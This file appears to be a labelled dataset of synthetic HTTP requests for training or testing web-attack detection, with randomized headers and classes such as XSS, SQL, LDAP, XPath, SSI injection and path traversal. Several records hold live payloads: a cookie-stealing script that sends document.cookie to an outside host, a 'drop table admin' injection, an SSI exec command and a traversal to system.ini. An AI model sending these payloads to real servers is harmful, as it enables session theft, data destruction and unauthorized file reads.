From: kvhmage@1ptmhTa.org
If-Modified-Since: Wed, 26 Jul 06 02:05:21 CET
If-Unmodified-Since: Tue, 29 Aug 06 23:27:33 GMT
If-Match: "EezgoY@xNeRCtugFgwNI"
If-None-Match: *
If-Range: Thu, 16 Oct 08 24:50:23 CET
Max-Forwards: 4186
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic aXJEenRldGs6cndhY3Q=
Authorization: htnNnv en2g=pencllpe
Range: -13,5-
Referer: http://5nee3.com/Mmab/ttOec.png
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/6.8 (X11; U; Solaris 9.7; co-dr; rv:0.3.2) Gecko/46789002
UA-CPU: Sparc
UA-Disp: 2986,5659,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 316x0903
Via: 2.1 201.150.192.104, FTP/2.0 142.91.43.5
Transfer-Encoding: compress
Upgrade: xRgntq/5.9, 80qw6/9.4, rSdi/2.7, ttopmd/4.9
Warning: 003 60.71.243.7 "olt7lttIl5tS" "Mon, 09 Jun 08 19:36:33 GMT"
X-Forwarded-For: 60.213.229.203
X-Serial-Number: 7270498522514093
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

ac0ms=wppanrtatk3Ploejae&Tuoeksa5tt=aheTetbg8L&egq4Cfy=a5Qd4hPFLB_e&6th=\Ao&e80wdqonixd3vsh=:c&lfttAktsad=6278&ARoidqax=79    or    1<  e40/Ptar/pc/child::text()[position()=792]    or  90557='] | /* | /foo[bar='&hrntghvz=ytwlk%u6&G47bUbyfg=8abie

End - Id: 48581
Start - Id: 47485
class: XSS
GET /h3/pt/o./C8H-G/body-omvehaving/i50_Ru/iubepltiote/ihee.php3?3xmrshhnp=%3Cdiv+onmouseover+%3D+++%22++++%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.taneme.com%2Fcgi-bin%2Fsiro.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&KWYD=r7fe-an%3Fperlsasock_streamtkow&efa1hB=032&Ut6R=%29eTch+os&re1rwcmf48=1eMcgyhsd&etIhe=58&dimmty9qnox=360776&eFphpvSgEB-I=359029&2atibnrI=7417126&ijvgtefecgd6=5&nEl=mL8lhkR&ienheqi8eu=nhethai&1sitfenGhoftnre=185&29rtdwei=t%7Eansesu+merti HTTP/1.1
Host: www.euaxco.ch:80
Connection: rndefm
Accept: text/plain, video/*;q=0.9, video/mpeg
Accept-Charset: x-mac-japanese, euc-kr, iso-8859-8;q=0.9
Accept-Encoding: gzip;q=0.9, deflate;q=0.9, identity, compress
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 66.213.204.241
Cookie: ila6et=938741532
Cookie2: $Version="376"
Date: Sun, 16 Apr 06 09:35:42 UTC
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Tue, 06 Jun 06 02:04:37 CET
If-Unmodified-Since: Wed, 12 Aug 09 09:59:31 UTC
If-Match: "6ws-g8rj4ia9UoU762a"
If-None-Match: "Jo5FcRmvfghqVjAzYkIH"
If-Range: Mon, 18 Aug 08 20:08:52 CET
Max-Forwards: 461
MIME-Version: 0.9
Pragma: rzN1zei='aTe7ye2'
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 9183-933,-0
Referer: http://eohs2.cz/8dux/tttt/eio6n/nneomIh.asmx
TE: trailers,trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/2.7 (Windows; U; Win 9x 6.5; 0s-oo; rv:5.4.6) Gecko/70735628
UA-CPU: x86
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: identity
Upgrade: ehTh/2.2, etnsh/9.8, hi5/2.0
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47485
Start - Id: 42661
class: SqlInjection
GET /kneplIssjeWdi/jUz92592MAC..QoE.cfm?to=80055909&Ilrp@=nhBpB2J&7RE7o31yohmt2qt=223744&ahEncwa720c1rni=%27%3B++++drop+++table+++admin&BGo1Zphp@ZJ=%3FeUOGgroup+by%5C9Ta%27etc+&ovadTqethi=eynsd&ac=0&viframeBsamQYyLvarQ=Asq&ay@22hv=hbrIgOX%40LM4 HTTP/1.0
Host: 52.223.225.210
Connection: r2fea
Accept: text/plain, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: bR2oatdi-tc;q=0.3
Cache-Control: max-stale=710
Date: Thu, 31 Dec 09 10:34:53 GMT
ETag: W/"l.gpCOT9l_T0QwKSgq"
If-Modified-Since: Tue, 14 Sep 04 03:56:19 GMT
If-Match: *
If-None-Match: "Wz6QvjY4qmlVN6EL_-"
Pragma: i=i
Authorization: Basic OWVlYWk6bnNlYXQ=
Referer: /n1ybukth/hoTraT.js
User-Agent: Mozilla/4.5 (Windows; U; Win98 5.5; bI-ns; rv:6.6.8) Gecko/53653541
Via: 0.4 www.stIc.gif, HTTP/2.2 www.eei0e.gif
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42661
Start - Id: 36954
class: LdapInjection
PUT /utbhsWimT3R/housnp1tmunhNnce6an/e1lnrgttihe/y976RrE1Q./luVFvDhF.asp? HTTP/1.1
Content-Length: 344
Content-Language: eiEtm
Content-Encoding: compress
Content-Location: /obT8w8.conf
Content-MD5: dHBxeGN4RG5zNWxhaWhydA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Tue, 24 Feb 09 02:01:07 CET
Host: 218.37.226.7
Connection: ji2aiE
Accept: */*
Accept-Charset: iso-8859-3;q=0.1, iso-8859-3;q=0.6, isiri-3342
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.8
Cache-Control: min-fresh=11
Client-ip: 216.121.4.71
Cookie: Ao7yecxAt=99;ieeu5sc2tuWssb=ni;e7=ti$4bsmbefr8rl;fn=wc;rDsoo4xio1svis=aUb_I_fNMh8F
Cookie2: $Version="0"
Date: Sat, 09 Feb 08 09:23:13 UTC
Expect: 100-continue
If-Match: *
If-None-Match: *
Max-Forwards: 35
MIME-Version: 6.6
Authorization: NTLM b3RuY1NDbmFFVGVFSHVhbjZlcmVmNmhuN29jZWV6bWljbmVybWNsbUVoZWxoOQ==
Range: -69,-806
Referer: /mnaot/enmRtniA/iannvc.png
TE: gzip,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/8.5 (Windows; U; Windows NT 8.6; n7-ao; rv:3.3.3) Gecko/24498814
UA-Disp: 5315,7595,8
UA-OS: Win98
UA-Color: color32
Via: 4.6 www.owac.shtml, HTTP/1.1 www.e0ote.htm
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

wjqnytelnetUAN=707518054&oyk=&Y-&vtasWeHd=s htausr34cwrcam-r<&sr2bria2Aeo=aVoh&mqEoolouRwone1=6E0a83uhttpnboot.iniusnli2&s637=6627&6lznfloiritaoen=71488&rgdow3aiD=oA-t6.YKhRY&eo1sepreCt2wue0=940949&wfob=880&qgTg=9wNTGHbz&stGhD2Ih0=68822&niredtrpr=rkt1ematoLngsidruw&w-pLusrj3R7=")(targetfilter=(o=NetscapeRoot))&5VZV2=066828

End - Id: 36954
Start - Id: 39932
class: SSI
PUT /ucnnrtigitnfsjt2a/cDsR/tTpmzur4JBQVNsJj6/mz1LHns/sb3aEanseikLWn7Qq/psw.html? HTTP/1.1
Content-Length: 113
Content-Language: I3diylu,3lt,4taa
Content-Encoding: identity
Content-Location: /7egOe/iuraair/tist/0hslrn/5atj.gif
Content-MD5: YWN4b3N1dG95c3JpYW5ndg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Oct 08 12:21:57 UTC
Last-Modified: Fri, 30 Jun 06 07:25:29 CET
Host: www.Tunolwxrn.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: Zhu-4, iop1-liegte;q=0.4, lt-Rln
Cache-Control: e=otnEm
Client-ip: 241.54.246.2
Cookie: ktndodpou0=position;Airnni=h(oDh0iee8t]wget  r\e;Iau4iH5eiaiiti=tY.cBGrju;sc=bN.1vZTVvg1Y;yt=rnNl]
Cookie2: $Version="64"
Date: Sun, 02 Apr 06 02:14:27 UTC
ETag: "904lqZNeUrGwrPUmWLi1"
Expect: 100-continue
From: 2nbiytae@onefd75.cz
If-Modified-Since: Wed, 16 Jun 04 07:25:43 GMT
If-Unmodified-Since: Fri, 26 Dec 08 13:45:40 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Feb 08 02:53:56 UTC
Max-Forwards: 733
MIME-Version: 6.0
Pragma: eyn2tl=de
Proxy-Authorization: Digest username="isnm"
Authorization: Basic ZHN0c3I6c2hlanNlUw==
Range: 065804-4,-22740,4181-
Referer: /Meeweod/hhfllEhI/siedtmtu/neetcg/Ttoir.mpg
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: 2od1a/6.9.0.2.1
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: 3.2 40.239.123.253
Transfer-Encoding: gzip
Upgrade: awoh/8.2
Warning: 800 145.154.254.159 "waio" "Sat, 03 Feb 07 02:53:35 CET"
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rDwotett4ib=?jA&qewindow.opentfiB7i67n=?Br\&jeoroaIuttY=<!     #<!--  #exec cmd="id"-->

End - Id: 39932
Start - Id: 38593
class: LdapInjection
GET /cEGkg-/pVFw6QaX/wu/wGHsock_streamVH8o7lsP-Aa/ksqAiit2a7gkhabu/brJSnHlX0e_Uj/aFCjVq4YyD@h/e5k5/Io/nilS/um7et2preat/JKwenbtdnteI5tJLr.dll?gnallHmIlcopy=%29+%28%7C++%28cn%3D*o+%27brien*+++%29%28mail++++%3D*o+++%27brien*+++%29+ HTTP/1.1
Host: www.lsft.st
Connection: close
Accept: text/html, text/xml;q=0.8, image/*;q=0.8
Accept-Charset: iso-2022-kr, windows-874, utf-8
Accept-Encoding: 
Accept-Language: areertn-ggivr, 3ydn1m-sohC;q=0.8, f7-zc7wtef
Cache-Control: min-fresh=1
Client-ip: 165.158.133.130
Cookie: c@5PQuOunion8d7=48;O2teFNyQsUf=a;JsKaa=mmx;caeyefh=033;iftnpieenasnUk=o.KUSoa4d
Cookie2: $Version="61"
Date: Tue, 15 Apr 08 01:49:31 UTC
ETag: W/"syOB.UeNs9HQB7O"
Expect: 100-continue
From: Henr0sl4@nexht.fr
If-Modified-Since: Thu, 13 Jul 06 13:55:09 UTC
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: "E-H6CFYwMpZNHIR"
If-None-Match: "h1BPi-nTdopDD7D95"
If-Range: *
Max-Forwards: 3210
MIME-Version: 7.0
Pragma: Eeua='tika'
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: NTLM OG9zY2hzc2F4c25zZXlyaW44RWV2YXBlZlM2bW92dzRBcnN5cGNpZXRsZXM=
Range: -348176
Referer: http://www.ymqtx.org/tRCais8t/ewmnnhs/fmn0dhZ1.tar.gz
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: 05rATrdy (i8XYfPOe; aVI9ljE; tmvvIk.z; rdSb.cP9)
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2971x6869
Via: FTP/2.3 209.176.240.142
Transfer-Encoding: identity
Upgrade: o9ttnl/4.2, 5tnn/9.6, rmt/0.6
Warning: 619 187.93.166.222 "etLesebuo9iioii" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 379109696738614
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38593
Start - Id: 37284
class: LdapInjection
PUT /hesUttricrtdsw5ee/nQZ8a/llPriJLj4CBx_/Ig3telnetSI4meta/pw/utlmaBU9/edQjYRBQO9knm_JmJ6z0/scmIE2YJ_h.bin? HTTP/1.0
Content-Length: 114
Content-Language: b
Content-Encoding: compress
Content-MD5: c3J0dGFyZW5veWhpZWNoOA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Jan 09 03:22:54 UTC
Host: www.rzAuiei.org
Connection: keep-alive
Accept-Charset: x-mac-chinesesimp;q=0.3, euc-tw, euc-jp, koi8;q=0.7
Accept-Encoding: oDzu)(|  (Rneoc=*)
Accept-Language: *
Cache-Control: max-stale
ETag: "qd9agOySGbi2Gujjf4P"
If-Unmodified-Since: Sat, 21 Jul 07 13:35:12 UTC
If-Range: *
Referer: http://msoih.be/atn1E/aqo3hdet/llijo/idsLs/egfostt.php
User-Agent: hYmiat (s5rvVV; oan@zfR_j)
Transfer-Encoding: fo9iH; peeAsTt=u0n35

aoatkidrmadt3tt=uf&apkfs=httpsse4&a4o=7Pul4s&Isuc=epEMjx&ri7fsbs=l4C.t.Xs9n&yePpse3aoz=a&7Hye=721137&djRRN=8895040

End - Id: 37284
Start - Id: 47788
class: XSS
GET /-Je.Ru70/ctJ-UJe6b/Pn/1t@NoaK3ENMDwD76h/qhHfxm0s/kyEQiq.php4?gkieomsn=oa&Ns=2954289368&vdcbh=sh+tauirimgplh%28ma&sorec4etswure=script+++alert%28aIer.eesmuF%29script+&QmailQformR=dhtste1&processing-instructionCOs9Q=oeelssrIhtpassldno0cNieg&olGros6aasnq2O=OuElhe HTTP/1.0
Host: 172.155.57.112
Connection: keep-alive
Accept: application/*
Accept-Charset: hz-gb-2312;q=0.2, iso-8859-7, x-mac-turkish
Accept-Encoding: 
Accept-Language: sir-dLSlSlq;q=0.3, tt-rn;q=0.5, ssrLeiaf-c;q=0.7, coaui-eol;q=0.2, sedtn-rnybdlz;q=0.1
Cache-Control: min-fresh=67
Client-ip: 226.38.61.226
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="70"
Date: Mon, 10 Dec 07 14:22:03 CET
ETag: W/"5Ztigf4VNFI34Up"
Expect: 100-continue
From: dRkiaeue@o6si.cz
If-Modified-Since: Thu, 19 May 05 02:03:23 CET
If-Unmodified-Since: Sat, 09 Apr 05 24:40:00 UTC
If-Match: *
If-None-Match: "d6BRANSFN99dGsRj"
If-Range: Wed, 15 Jul 09 09:54:45 GMT
Max-Forwards: 2
MIME-Version: 8.5
Pragma: itl9loht=bubk
Proxy-Authorization: Digest username="oaid"
Authorization: Basic dGlZaTZSejpldG80aG5w
Range: 9830-
Referer: /Zed2hsbd/hoih/rqanvn/dbLsmu.jsp
TE: gzip,gzip,gzip
Trailer: Accept-Language
User-Agent: Eenphaue/9.7.8
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7737x1025
Via: HTTP/8.4 www.yidb.css
Transfer-Encoding: compress
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47788
Start - Id: 49463
class: XPathInjection
GET /uka2NO4documentpYMW-/expE8fwhiUpMUk1g/iWnZO1wGckTg_8ErO-.htm?r9Oickmvjin=otnni6nct5&jqtlpRipdeennz=95&NTxO6script=q.diB&m7tE=5&ao2c=6&iulpn=ehOq%27%5D++++%7C++++P+%7C++%2F%2Fuser%5B++name%2Ftext%28+%29+++%3D++++%27Idc3u&tsnnoptE=a2e&ghdpL9Tesr=brcvsw8d HTTP/1.1
Host: www.eqetsa1rf.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=0
Client-ip: 26.220.54.168
Cookie: rnefsarctnve=nOnMe;Bzupdaten=nac;hAdetwvel=e60HLsfgZ;T2dtiDerreN=oZ_J6GPpjVHc;tTe1e=y~t5;WbLcm0_1V7=mMmi
Cookie2: $Version="182"
Date: Sun, 26 Apr 09 04:59:57 UTC
ETag: "SmZqfMrAN90WPwXEG8YZ"
Expect: POes=p4aun;djhEbu=gsoao
From: n5thibdN@srSdAet.st
If-Modified-Since: Thu, 19 Aug 04 07:11:22 GMT
If-Unmodified-Since: Tue, 23 Jan 07 09:00:29 UTC
If-Match: "sZ2xhEON3HrNh@Y"
If-None-Match: *
If-Range: "L2_eRyjXKIW6hbHqV5"
Max-Forwards: 0700
MIME-Version: 3.2
Pragma: bo02l='l'
Proxy-Authorization: NTLM dGVuaWVyaGZibGZ3c2NzN2U1ZTlyaGxVbGJENWNvZWlzZExnYWdjQXRvc0FmdDc=
Authorization: Digest uri=http://www.sauLhr.st/um6stglg/w1aaLoe/blons/Tdoty/o9ao60t.jpeg
Range: -012
Referer: /tlmes.gif
TE: trailers
Trailer: Cache-Control
User-Agent: aS8tsSkdcegeuowi
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 527x1451
Via: 7.5 8.14.16.25:2, 9.8 91.199.78.228:41
Transfer-Encoding: compress
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 16.113.150.28
X-Serial-Number: 812184590933752195
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49463
Start - Id: 48969
class: XPathInjection
GET /Yp5LPscriptgBWlinkr/4UhTe3zvsnZGxqoxdH/P5xvk7H/gxelZkcyah0i27NI7/1.ffxjo/eo/roSLE/auJboot.iniSsock_stream/stqiyW6wQF/W3wgetpchildxJN@fv0h2T/r28if1/_Lsvn.mdb?mslntcsmohmaaxr=sgtn&45G_=p6tp0srLt3sortaj0&Olmmoeanen5jet=22649&soRsso3aerc2=seonu&o2sefenk94=ecLl+de%5Cc2o&srauitswutEqt7=43&connectCKi7ImOM=yCsE.xk7P.&N7703=+j6mbonndeftp%26&qatani=e0KMoKC_h%40D9&8UndH5zsbgS=uc3behse%27+++++or++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+%27iapho%27+++%3D++%27 HTTP/1.1
Host: 6.124.250.51
Connection: i0mrrok
Accept: image/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 196.26.247.32
Cookie: _0aLRL219=tMi-2DVCVjv.;da=objectetds;eihcont=54JsDqRZUocG;-@passthrus9s=6
Cookie2: $Version="6"
Date: Fri, 21 Jan 05 06:12:14 GMT
ETag: W/"jYHztclesekjaK2po0"
Expect: 100-continue
From: bthrh@77e4enih.uk
If-Modified-Since: Wed, 04 Jul 07 10:21:38 UTC
If-Unmodified-Since: Fri, 05 Nov 04 17:39:07 UTC
If-Match: "FbroY8fbk.4kZOkT"
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 6.3
Pragma: e=ei
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: http://www.wtsaier.cz/lme6e/amrBhtt/yTrl3cj/Yrihei.asmx
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.3 (Windows; U; WinNT 6.8; ee-sn; rv:5.1.9) Gecko/58875482
UA-CPU: 68000
UA-Disp: 7135,390,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 395x881
Via: 7.4 117.73.39.254
Transfer-Encoding: identity
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 932 www.wwas6l.css "3kbciaaakjefi5ciec" "Tue, 30 May 06 18:44:25 CET"
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 48969
Start - Id: 35586
class: XPathInjection
GET /8netcatxc/spoc/tnieqtsitn/dJcUGCrg/team3oenN.php?zasse9whstirmn=%3DpTe3&0Ieaioemtsuir3=33&VsamX4EO=619447&w6isad=tnryeo%2F8i%2Fmm%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D07%5D++%7C+++++Tef1%2Feaeb%2Fvnut%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D93%5D+++++or++++%27ccteox%27+++%3D++++%27&Eut9edtuo=92641&w6lEsmoAliit=37680&kgaOetMieouWitl=ak0gCfUw8 HTTP/1.0
Host: www.aq0A3.biz
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-greek, x-mac-arabic, windows-874;q=0.3, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 146.199.243.126
Cookie: de=847;S75tRDUDzV=r;tfNOGRcKB=izob
Cookie2: $Version="8"
Date: Tue, 30 Oct 07 12:52:03 CET
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
From: keef8S@qicoiNe.be
If-Modified-Since: Tue, 22 Nov 05 17:52:05 CET
If-Unmodified-Since: Thu, 02 Feb 06 05:06:50 GMT
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 21 Feb 06 19:09:43 CET
Max-Forwards: 03
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM OTFsanJtN3JQNWwwbzBwdHNvd2xFd29leXNXbmVPZHVlMXRzbkhvbWZtajZl
Authorization: Basic bnNmc2k6MnAzYWM=
Range: 1278-6
Referer: /uzoji/5h6u.pdf
TE: trailers
User-Agent: Mozilla/8.3 (Windows; U; Windows NT 3.5; rt-ty; rv:7.6.7) Gecko/52015161
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 468x391
Via: HTTP/2.1 www.ndeot.png, 6.2 www.momfs2ti.shtml, FTP/4.7 218.225.175.124
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 764 www.estd.html "reyeebllnhmEobh" 
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35586
Start - Id: 41923
class: SqlInjection
GET /hTV0mMTK_fewbCLgejR0/g3LcuUWb/pXpWK/Men8snenojsleknjqfn/eiKxsj/JY/el5e6yuOi/Wu9wgkwzTzn/kJ4ytntHPl/9KFRqn9/4Al2FNEysDxkvmhq_.tiff?6fVmukqazsc=%27+UNION++++++++++ALL+++++SELECT+++eenflsh++++FROM++5nee1gpR9o++++WHERE++%27%27+%3D+%27&Sthscp97sdnn=mrooetkybLtoT+ HTTP/1.1
Host: www.5niyrht.fr
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.8, iso-8859-8-i;q=0.2, iso-8859-8, utf-8, utf-8;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=91
Client-ip: 21.123.50.241
Cookie: tdtusaiarf=abe~>;gitcsUVIaa1otf=$ei$y
Cookie2: $Version="26"
Date: Sat, 11 Dec 04 13:09:57 GMT
ETag: "o4V4NB.J9gXaYf8twh"
Expect: ywWtykim
From: usDda@iceeiIo.gov
If-Modified-Since: Fri, 20 Jul 07 15:35:46 GMT
If-Unmodified-Since: Wed, 27 Jul 05 06:35:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 18 Apr 09 13:12:21 UTC
Max-Forwards: 5983
MIME-Version: 9.6
Pragma: crrl='entsn5t'
Proxy-Authorization: Digest realm
Authorization: Digest qop=auth
Range: -0
Referer: http://www.ee1og.org/ciian/evte.pdf
TE: deflate;q=0.9,trailers,chunked;q=0.7
Trailer: If-Range
User-Agent: Mozilla/6.9 (compatible; MSIE 6.8; Open BSD i386; iEt7Yeb; 4dv4wanaa)
UA-CPU: 68000
UA-Disp: 421,960,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9010x724
Via: FTP/6.7 www.hh2Uh.jpg, undh/1.9 www.aehoss.jpg:92933, 7.8 www.rIp3ftA.tiff
Transfer-Encoding: eoA7
Upgrade: gs3/3.5, sao/7.3, xcz/3.3
Warning: 941 www.opH3rr.tiff "cssrqn2d5ar9lsne3" "Mon, 23 May 05 22:26:08 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41923
Start - Id: 36153
class: PathTransversal
GET /h@eQ/Mbetween5r.swf?nmxyr6elqpErti=l&iaenhhNelosdey=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&mN0vwG=602715&Ntthsdars=eKe%24taese&a1eminTilw=cqdtpsetla261%3CTteeeh HTTP/1.0
Host: www.twzTaehl.st:717
Connection: unp4a
Accept: text/plain
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.9
Accept-Language: efoelfn-yr, f-t, 9-e, tttlrP-Am
Cache-Control: only-if-cached
Client-ip: 52.138.136.254
Cookie: olroa=>oenr4oY\l<lssystemtnpt0n;iooe=i8cT_CySNn;NhhqaiilySci4=a_W;ceoodolqlstseh=fS8NtgbrrtozrBa
Cookie2: $Version="9"
Date: Sat, 31 Jan 09 14:40:07 UTC
ETag: W/"ns9fmDOQwg1@j3lH"
Expect: etoihr
From: pedvr95@1bltoRr.com
If-Modified-Since: Mon, 24 Jan 05 21:29:25 CET
If-Unmodified-Since: Mon, 16 Feb 04 22:03:01 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8376
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic eWl1NWVlZTpIc3NkYWE=
Authorization: telnw9 sDavlYt=vHaut
Range: 375-
Referer: /ph5aei/naee/dthoyv/iitnn.asp
TE: chunked;q=0.9
Trailer: Expect
User-Agent: 6ostyol/6.3.5
UA-CPU: PowerPC
UA-Disp: 4342,924,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9880x9117
Via: HTTP/8.5 207.201.75.115, ie15/3.9 www.xfss.jpg:4
Transfer-Encoding: deflate
Upgrade: bhte/9.7, rertro/9.5
Warning: 211 www.cnett.htm "eObeoNe1e" "Sun, 12 Jun 05 24:16:59 UTC"
X-Forwarded-For: 27.217.111.45
X-Serial-Number: 5877134216571
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36153
Start - Id: 35587
class: XPathInjection
GET /boPg3xFOiBstmJWB/y5zq-nCl/lec5S/NHUN@yuSLF@lXS/My4LNFnullUcq.gif?dtubs=m+n&toyooeoehlteae=d%2FRl%2Fpi%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D653%5D+++++or++%27iHi6aLse%27+%3D++++%27&sUr8=372&.rKtmpAcds5H=cnts%3B3eiarmAD%24e&wg1c=malllogsD%7ElqsLo&modf=tmyp1swDoconnectsct%25%7Ei%3Azal&let9rnchxR=dolmco HTTP/1.0
Host: 186.51.41.158:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 146.199.243.126
Cookie: de=847;S75tRDUDzV=r;tfNOGRcKB=izob
Cookie2: $Version="8"
Date: Thu, 25 Jun 09 03:35:34 UTC
ETag: W/"hI@P2lhb.9ij7_jV"
Expect: 100-continue
From: keef8S@qicoiNe.be
If-Modified-Since: Tue, 22 Nov 05 17:52:05 CET
If-Unmodified-Since: Mon, 27 Apr 09 09:40:51 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: *
If-Range: Tue, 21 Feb 06 19:09:43 CET
Max-Forwards: 32
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM OTFsanJtN3JQNWwwbzBwdHNvd2xFd29leXNXbmVPZHVlMXRzbkhvbWZtajZl
Authorization: Basic bnNmc2k6MnAzYWM=
Range: 1278-6
Referer: http://EAScR.it/s8cy/Ucci/nmNtiae.php4
TE: trailers
User-Agent: nkQbWj88O http://www.5wxei.com
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 468x391
Via: HTTP/2.1 www.ndeot.png, 6.2 www.momfs2ti.shtml, FTP/4.7 218.225.175.124
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 764 www.estd.html "reyeebllnhmEobh" 
X-Forwarded-For: 245.111.237.199
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35587
Start - Id: 39690
class: SSI
